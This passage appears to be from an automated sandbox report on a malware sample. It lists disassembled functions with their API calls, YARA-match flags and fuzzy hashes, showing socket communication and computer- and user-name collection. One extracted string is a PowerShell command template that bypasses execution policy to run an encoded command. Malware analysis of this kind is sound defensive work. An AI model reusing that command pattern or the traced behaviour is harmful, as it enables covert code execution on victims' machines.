                    • _invalid_parameter_noinfo.LIBCMT ref: 0068FD76
                    • _errno.LIBCMT ref: 0068FD6B
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1812809483-0
                    • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                    • Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
                    • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                    • Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CF176
                    • _errno.LIBCMT ref: 001CF16B
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1812809483-0
                    • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                    • Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
                    • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                    • Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700
                    APIs
                      • Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
                      • Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6
                    • DecodePointer.KERNEL32 ref: 006802D8
                    • DecodePointer.KERNEL32 ref: 006802F6
                    • EncodePointer.KERNEL32 ref: 00680324
                    • DecodePointer.KERNEL32 ref: 00680339
                    • EncodePointer.KERNEL32 ref: 00680344
                    • DecodePointer.KERNEL32 ref: 00680356
                    • DecodePointer.KERNEL32 ref: 00680366
                    • __crtCorExitProcess.LIBCMT ref: 006803EA
                    • ExitProcess.KERNEL32 ref: 006803F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                    • String ID:
                    • API String ID: 1550138920-0
                    • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                    • Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
                    • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                    • Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                    • String ID:
                    • API String ID: 3339321253-0
                    • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                    • Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
                    • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                    • Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740
                    APIs
                      • Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
                      • Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
                      • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
                      • Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
                      • Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
                      • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B
                    • GetTickCount.KERNEL32 ref: 00676BAA
                      • Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
                      • Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
                      • Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
                      • Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2
                    • GetTickCount.KERNEL32 ref: 00676BC2
                    • GetTickCount.KERNEL32 ref: 006770E0
                    • GetTickCount.KERNEL32 ref: 006770F6
                    • shutdown.WS2_32 ref: 00677115
                    • shutdown.WS2_32 ref: 0067712A
                    • closesocket.WS2_32 ref: 00677134
                    • free.LIBCMT ref: 00677154
                    • free.LIBCMT ref: 00677169
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                    • String ID:
                    • API String ID: 3610715900-0
                    • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                    • Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
                    • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                    • Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56
                    APIs
                    • _errno.LIBCMT ref: 00687ABB
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00687AB3
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00687AFF
                    • _lseek_nolock.LIBCMT ref: 00687B18
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                    • String ID:
                    • API String ID: 310312816-0
                    • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                    • Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
                    • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                    • Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719
                    APIs
                    • _errno.LIBCMT ref: 00687C33
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00687C2B
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00687C77
                    • _lseeki64_nolock.LIBCMT ref: 00687C90
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                    • String ID:
                    • API String ID: 4140391395-0
                    • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                    • Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
                    • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                    • Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729
                    APIs
                    • _errno.LIBCMT ref: 001C7033
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C702B
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C7077
                    • _lseeki64_nolock.LIBCMT ref: 001C7090
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                    • String ID:
                    • API String ID: 4140391395-0
                    • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                    • Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
                    • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                    • Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21
                    APIs
                    • _errno.LIBCMT ref: 001C6EBB
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C6EB3
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C6EFF
                    • _lseek_nolock.LIBCMT ref: 001C6F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                    • String ID:
                    • API String ID: 310312816-0
                    • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                    • Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
                    • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                    • Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno
                    • String ID:
                    • API String ID: 2288870239-0
                    • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                    • Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
                    • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                    • Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351
                    APIs
                    Strings
                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                    • Address %p has no image-section, xrefs: 00401DC0
                    • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                    • Mingw-w64 runtime failure:, xrefs: 00401D88
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: QueryVirtual
                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                    • API String ID: 1804819252-1534286854
                    • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                    • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                    • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                    • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                    APIs
                    • _errno.LIBCMT ref: 0068645F
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00686457
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 006864A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                    • String ID:
                    • API String ID: 2611593033-0
                    • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                    • Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
                    • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                    • Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729
                    APIs
                    • _errno.LIBCMT ref: 001C585F
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C5857
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C58A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                    • String ID:
                    • API String ID: 2611593033-0
                    • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                    • Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
                    • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                    • Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                    • String ID:
                    • API String ID: 2289611984-0
                    • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                    • Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
                    • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                    • Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A
                    APIs
                    • _errno.LIBCMT ref: 00685C79
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00685C71
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00685CBD
                    • _close_nolock.LIBCMT ref: 00685CD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                    • String ID:
                    • API String ID: 4060740672-0
                    • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                    • Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
                    • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                    • Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19
                    APIs
                    • _errno.LIBCMT ref: 001C5079
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C5071
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C50BD
                    • _close_nolock.LIBCMT ref: 001C50D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                    • String ID:
                    • API String ID: 4060740672-0
                    • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                    • Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
                    • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                    • Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750
                    APIs
                    • malloc.LIBCMT ref: 006646A9
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 006646B3
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • malloc.LIBCMT ref: 006646BE
                    • free.LIBCMT ref: 0066487E
                    • free.LIBCMT ref: 00664886
                    • free.LIBCMT ref: 0066488E
                      • Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
                      • Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
                      • Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
                      • Part of subcall function 006654F0: free.LIBCMT ref: 00665634
                    • free.LIBCMT ref: 0066489A
                    • free.LIBCMT ref: 006648A7
                    • free.LIBCMT ref: 006648B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$malloc$_errno$_callnewh$AllocHeap
                    • String ID:
                    • API String ID: 3534990644-0
                    • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                    • Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
                    • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                    • Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04
                    APIs
                    • malloc.LIBCMT ref: 001A3AA9
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A3AB3
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • malloc.LIBCMT ref: 001A3ABE
                    • free.LIBCMT ref: 001A3C7E
                    • free.LIBCMT ref: 001A3C86
                    • free.LIBCMT ref: 001A3C8E
                      • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
                      • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
                      • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
                      • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34
                    • free.LIBCMT ref: 001A3C9A
                    • free.LIBCMT ref: 001A3CA7
                    • free.LIBCMT ref: 001A3CB4
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$malloc$_errno$_callnewh
                    • String ID:
                    • API String ID: 4160633307-0
                    • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                    • Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
                    • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                    • Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                    • malloc.LIBCMT ref: 001ABF3B
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
                      • Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
                      • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
                      • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711
                      • Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE
                      • Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8
                      • Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07
                    • malloc.LIBCMT ref: 001AC04A
                    • _snprintf.LIBCMT ref: 001AC0C1
                    • _snprintf.LIBCMT ref: 001AC0E7
                    • _snprintf.LIBCMT ref: 001AC10E
                    • free.LIBCMT ref: 001AC2C6
                      • Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
                      • Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                    • String ID: /'); %s
                    • API String ID: 1314452303-1283008465
                    • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                    • Instruction ID: 2e1e53b0162e0ebcb552ed176464fe12739a6b053966d81585ff3166033a2d9c
                    • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                    • Instruction Fuzzy Hash: 0DA1D13530068186DB18FBB2E8917EE7392ABA67C1F804125FE5A47796DF3CC806C741
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • malloc.LIBCMT ref: 0067B528
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                    • GetComputerNameExA.KERNEL32 ref: 0067B5EA
                    • GetComputerNameA.KERNEL32 ref: 0067B61F
                    • GetUserNameA.ADVAPI32 ref: 0067B654
                      • Part of subcall function 0066F014: WSASocketA.WS2_32 ref: 0066F042
                    • malloc.LIBCMT ref: 0067B76D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                    • String ID: VUUU
                    • API String ID: 632458648-2040033107
                    • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                    • Instruction ID: d29d9931251baad784a1826376812f60e93414938d2a0f9df4c39f6f065345ae
                    • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                    • Instruction Fuzzy Hash: 69913636700A9086EB44EF6AD8653AD2353BB89BC4FC0D029EE0D5BB56DF39C945C704
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf
                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                    • API String ID: 3512837008-1250630670
                    • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                    • Instruction ID: 6a465962cabf8489c5691470ad028bed19716a351b7ab40bfcc4a69e4c0c2c17
                    • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                    • Instruction Fuzzy Hash: 7A719976300B85A6EB10DF61E8807ED77A1F799788F840526EE4E13BA8DF78C509C700
                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • GetStartupInfoA.KERNEL32 ref: 00671540
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                    • GetCurrentDirectoryW.KERNEL32 ref: 006715CD
